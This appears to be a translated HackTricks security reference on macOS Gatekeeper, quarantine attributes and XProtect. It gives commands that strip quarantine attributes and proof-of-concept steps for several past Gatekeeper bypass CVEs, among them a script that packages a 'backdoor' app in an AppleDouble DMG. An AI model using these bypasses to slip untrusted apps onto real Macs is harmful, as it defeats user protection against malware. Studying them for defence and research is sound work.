macOS Gatekeeper / Quarantine / XProtect

• 你在网络安全公司工作吗？想要看到你的公司在HackTricks中被宣传吗？或者想要访问PEASS的最新版本或下载PDF格式的HackTricks吗？查看订阅计划!

• 探索PEASS家族，我们独家的NFT收藏品

• 获取官方PEASS和HackTricks周边产品

• 加入 💬 Discord群](https://discord.gg/hRep4RUj7f) 或 电报群 或在Twitter上关注我 🐦@carlospolopm。

• 通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享你的黑客技巧

```c #include #include

enum qtn_flags { QTN_FLAG_DOWNLOAD = 0x0001, QTN_FLAG_SANDBOX = 0x0002, QTN_FLAG_HARD = 0x0004, QTN_FLAG_USER_APPROVED = 0x0040, };

#define qtn_proc_alloc _qtn_proc_alloc #define qtn_proc_apply_to_self _qtn_proc_apply_to_self #define qtn_proc_free _qtn_proc_free #define qtn_proc_init _qtn_proc_init #define qtn_proc_init_with_self _qtn_proc_init_with_self #define qtn_proc_set_flags _qtn_proc_set_flags #define qtn_file_alloc _qtn_file_alloc #define qtn_file_init_with_path _qtn_file_init_with_path #define qtn_file_free _qtn_file_free #define qtn_file_apply_to_path _qtn_file_apply_to_path #define qtn_file_set_flags _qtn_file_set_flags #define qtn_file_get_flags _qtn_file_get_flags #define qtn_proc_set_identifier _qtn_proc_set_identifier

typedef struct _qtn_proc *qtn_proc_t; typedef struct _qtn_file *qtn_file_t;

int qtn_proc_apply_to_self(qtn_proc_t); void qtn_proc_init(qtn_proc_t); int qtn_proc_init_with_self(qtn_proc_t); int qtn_proc_set_flags(qtn_proc_t, uint32_t flags); qtn_proc_t qtn_proc_alloc(); void qtn_proc_free(qtn_proc_t); qtn_file_t qtn_file_alloc(void); void qtn_file_free(qtn_file_t qf); int qtn_file_set_flags(qtn_file_t qf, uint32_t flags); uint32_t qtn_file_get_flags(qtn_file_t qf); int qtn_file_apply_to_path(qtn_file_t qf, const char *path); int qtn_file_init_with_path(qtn_file_t qf, const char path); int qtn_proc_set_identifier(qtn_proc_t qp, const char bundleid);

int main() {

qtn_proc_t qp = qtn_proc_alloc(); qtn_proc_set_identifier(qp, "xyz.hacktricks.qa"); qtn_proc_set_flags(qp, QTN_FLAG_DOWNLOAD | QTN_FLAG_USER_APPROVED); qtn_proc_apply_to_self(qp); qtn_proc_free(qp);

FILE *fp; fp = fopen("thisisquarantined.txt", "w+"); fprintf(fp, "Hello Quarantine\n"); fclose(fp);

return 0;

}

</details>

然后使用以下命令**删除**该属性：
```bash
xattr -d com.apple.quarantine portada.png
#You can also remove this attribute from every file with
find . -iname '*' -print0 | xargs -0 xattr -d com.apple.quarantine

并使用以下命令查找所有被隔离的文件：

find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.quarantine"

隔离信息也存储在由LaunchServices管理的中央数据库中，位于**~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2**。

Quarantine.kext

内核扩展仅通过系统上的内核缓存可用；但是，您可以从https://developer.apple.com/下载Kernel Debug Kit，其中包含扩展的符号化版本。

XProtect

XProtect是macOS中内置的反恶意软件功能。XProtect会针对已知恶意软件和不安全文件类型的数据库检查任何应用程序在首次启动或修改时。当您通过某些应用程序（如Safari、Mail或Messages）下载文件时，XProtect会自动扫描该文件。如果文件与其数据库中的任何已知恶意软件匹配，XProtect将阻止文件运行并向您发出威胁警报。

XProtect数据库由Apple定期更新新的恶意软件定义，并这些更新会自动下载并安装到您的Mac上。这确保了XProtect始终与最新已知威胁保持同步。

然而，值得注意的是XProtect并非完整的防病毒解决方案。它仅检查特定已知威胁列表，不像大多数防病毒软件那样执行访问扫描。

您可以获取有关最新XProtect更新的信息运行：

system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5

XProtect位于SIP受保护位置**/Library/Apple/System/Library/CoreServices/XProtect.bundle**，在bundle内部，您可以找到XProtect使用的信息：

• XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist：允许具有这些cdhashes的代码使用传统授权。

• XProtect.bundle/Contents/Resources/XProtect.meta.plist：禁止通过BundleID和TeamID加载的插件和扩展列表，或指示最低版本。

• XProtect.bundle/Contents/Resources/XProtect.yara：用于检测恶意软件的Yara规则。

• XProtect.bundle/Contents/Resources/gk.db：带有被阻止的应用程序和TeamIDs哈希的SQLite3数据库。

请注意，还有另一个与XProtect相关的应用程序**/Library/Apple/System/Library/CoreServices/XProtect.app**与Gatekeeper进程无关。

非Gatekeeper

请注意，Gatekeeper不会每次执行应用程序时都执行，只有在您执行已经由Gatekeeper验证的应用程序时，AppleMobileFileIntegrity（AMFI）才会验证可执行代码签名。

因此，以前可以执行应用程序以使用Gatekeeper缓存它，然后修改应用程序的非可执行文件（如Electron asar或NIB文件），如果没有其他保护措施，应用程序将带有恶意添加内容。

然而，现在这是不可能的，因为macOS阻止修改应用程序包内的文件。因此，如果尝试Dirty NIB攻击，您将发现不再可能滥用它，因为在使用Gatekeeper执行应用程序以缓存它后，您将无法修改bundle。例如，如果更改Contents目录的名称为NotCon（如在漏洞利用中指示的那样），然后执行应用程序的主要二进制文件以使用Gatekeeper缓存它，将触发错误并且不会执行。

Gatekeeper绕过

任何绕过Gatekeeper的方法（成功让用户下载并在Gatekeeper应该禁止时执行）都被视为macOS中的漏洞。以下是一些过去允许绕过Gatekeeper的技术分配的CVE：

CVE-2021-1810

观察到，如果使用Archive Utility进行提取，路径超过886个字符的文件将不会收到com.apple.quarantine扩展属性。这种情况无意中允许这些文件绕过Gatekeeper的安全检查。

查看原始报告获取更多信息。

CVE-2021-30990

当使用Automator创建应用程序时，关于其执行所需内容的信息位于application.app/Contents/document.wflow中，而不是在可执行文件中。可执行文件只是一个名为Automator Application Stub的通用Automator二进制文件。

因此，您可以使application.app/Contents/MacOS/Automator\ Application\ Stub指向系统内另一个Automator Application Stub的符号链接，它将执行document.wflow中的内容（您的脚本）而不触发Gatekeeper，因为实际可执行文件没有quarantine xattr。

预期位置示例：/System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub

查看原始报告获取更多信息。

CVE-2022-22616

在此绕过中，创建了一个zip文件，从application.app/Contents开始压缩而不是从application.app开始。因此，从application.app/Contents的所有文件都应用了quarantine属性，但没有应用到application.app，Gatekeeper正在检查的是这一点，因此Gatekeeper被绕过，因为当触发application.app时，它没有quarantine属性。

zip -r test.app/Contents test.zip

查看原始报告以获取更多信息。

CVE-2022-32910

即使组件不同，利用此漏洞的方式与先前的漏洞非常相似。在这种情况下，我们将从**application.app/Contents生成一个苹果存档，这样当通过Archive Utility解压缩时，application.app将不会获得隔离属性**。

aa archive -d test.app/Contents -o test.app.aar

查看原始报告以获取更多信息。

CVE-2022-42821

ACL writeextattr 可用于防止任何人在文件中写入属性：

touch /tmp/no-attr
chmod +a "everyone deny writeextattr" /tmp/no-attr
xattr -w attrname vale /tmp/no-attr
xattr: [Errno 13] Permission denied: '/tmp/no-attr'

此外，AppleDouble 文件格式会复制文件及其ACEs。

在源代码中，可以看到存储在名为**com.apple.acl.text的xattr中的ACL文本表示将被设置为解压后文件的ACL。因此，如果您使用AppleDouble**文件格式将应用程序压缩到zip文件中，并附带一个ACL以阻止其他xattr被写入...则隔离xattr不会被设置到应用程序中：

chmod +a "everyone deny write,writeattr,writeextattr" /tmp/test
ditto -c -k test test.zip
python3 -m http.server
# Download the zip from the browser and decompress it, the file should be without a quarantine xattr

查看原始报告以获取更多信息。

请注意，这也可以利用AppleArchives：

mkdir app
touch app/test
chmod +a "everyone deny write,writeattr,writeextattr" app/test
aa archive -d app -o test.aar

CVE-2023-27943

发现Google Chrome没有设置下载文件的隔离属性，因为存在一些macOS内部问题。

CVE-2023-27951

AppleDouble文件格式将文件属性存储在以._开头的单独文件中，这有助于在macOS设备之间复制文件属性。然而，注意到在解压AppleDouble文件后，以._开头的文件没有被赋予隔离属性。

mkdir test
echo a > test/a
echo b > test/b
echo ._a > test/._a
aa archive -d test/ -o test.aar

# If you downloaded the resulting test.aar and decompress it, the file test/._a won't have a quarantitne attribute

能够创建一个不会设置隔离属性的文件，这样就有可能绕过Gatekeeper。技巧是使用AppleDouble命名约定（以._开头）创建一个DMG文件应用程序，并创建一个可见文件作为对这个没有隔离属性的隐藏文件的符号链接。当执行dmg文件时，由于它没有隔离属性，它将绕过Gatekeeper。

# Create an app bundle with the backdoor an call it app.app

echo "[+] creating disk image with app"
hdiutil create -srcfolder app.app app.dmg

echo "[+] creating directory and files"
mkdir
mkdir -p s/app
cp app.dmg s/app/._app.dmg
ln -s ._app.dmg s/app/app.dmg

echo "[+] compressing files"
aa archive -d s/ -o app.aar

防止隔离 xattr

在“.app”捆绑包中，如果未添加隔离 xattr，则执行时Gatekeeper 将不会被触发。